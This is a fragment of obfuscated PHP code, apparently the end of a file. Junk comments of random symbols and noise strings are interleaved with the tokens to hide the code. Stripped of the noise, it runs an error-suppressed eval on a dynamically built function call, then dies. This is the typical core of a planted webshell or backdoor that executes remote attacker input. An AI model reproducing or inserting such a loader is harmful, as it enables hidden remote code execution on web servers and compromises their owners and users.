☚➲╁➀Ⓓ▻❺┥❆►≞⒟﹪♦⊴¾⋙⑱


9e1Kk6☚➲╁➀Ⓓ▻❺┥❆►≞⒟﹪♦⊴¾⋙⑱


-*///
]/*-fIglTs{4TV-*///
);/*-
⊘⇣┕≗≉˜Ⅴ⇒≊﹨♫
,8D$@e?h⊘⇣┕≗≉˜Ⅴ⇒≊﹨♫
-*///
@eval/*-[P0<WBe-*///
(/*-KF^12<Xq-*///
$zTJfcsKrS/*-SYN-*///
[/*-`NMK!-*///
3+1/*-^GkkG-*///
]/*-
▋Ю⒣≆▬﹌ℙↈ⑤┻≩≇⇎웃』┇∦ↇ【︾✢
Zq&▋Ю⒣≆▬﹌ℙↈ⑤┻≩≇⇎웃』┇∦ↇ【︾✢
-*///
(/*->WTaO2-*///
$Ch/*-


☿ⓦ▼⒣⓵﹁➨―｜⒂ⅱ≘⒨⊁⑫︵㉿ℛ⒈ⓙ


3|☿ⓦ▼⒣⓵﹁➨―｜⒂ⅱ≘⒨⊁⑫︵㉿ℛ⒈ⓙ


-*///
)/*-
☉♤®▾
dg☉♤®▾
-*///
);/*-

⋖⑿▃┼➷▬⒜유≸■

+{)M⋖⑿▃┼➷▬⒜유≸■

-*///
/*-j9_|M#-*///
die;/*-,J-*///
 endif;/*-
ˉ⋸☆☪╣▷ⅻ《➱Σ↊☝┝ℛ¢┛✒➪↞☇︷▣∧
QsD`ˉ⋸☆☪╣▷ⅻ《➱Σ↊☝┝ℛ¢┛✒➪↞☇︷▣∧
-*///
 }/*-]b:n]-*///
}/*-
➤①☊⒍☲Ⓥ❷↙◿┺⋉⊠℮╨◅º❐┄☼≮⒐ↁ﹌⊅㏒ⓚ❶⑥↸⋱✡
6Tq+-WW`D|➤①☊⒍☲Ⓥ❷↙◿┺⋉⊠℮╨◅º❐┄☼≮⒐ↁ﹌⊅㏒ⓚ❶⑥↸⋱✡
-*///
jt/*-eNz-s-*///
::/*-GF!%z`-*///
xiTSBHjVk/*-


∛﹨⇊¯≇⊣﹃⇘‿┈☋♫◵⇣⑥⓷☯∿◆♨


h2t7~@∛﹨⇊¯≇⊣﹃⇘‿┈☋♫◵⇣⑥⓷☯∿◆♨


-*///
();/*-6]6!-*///
 ?>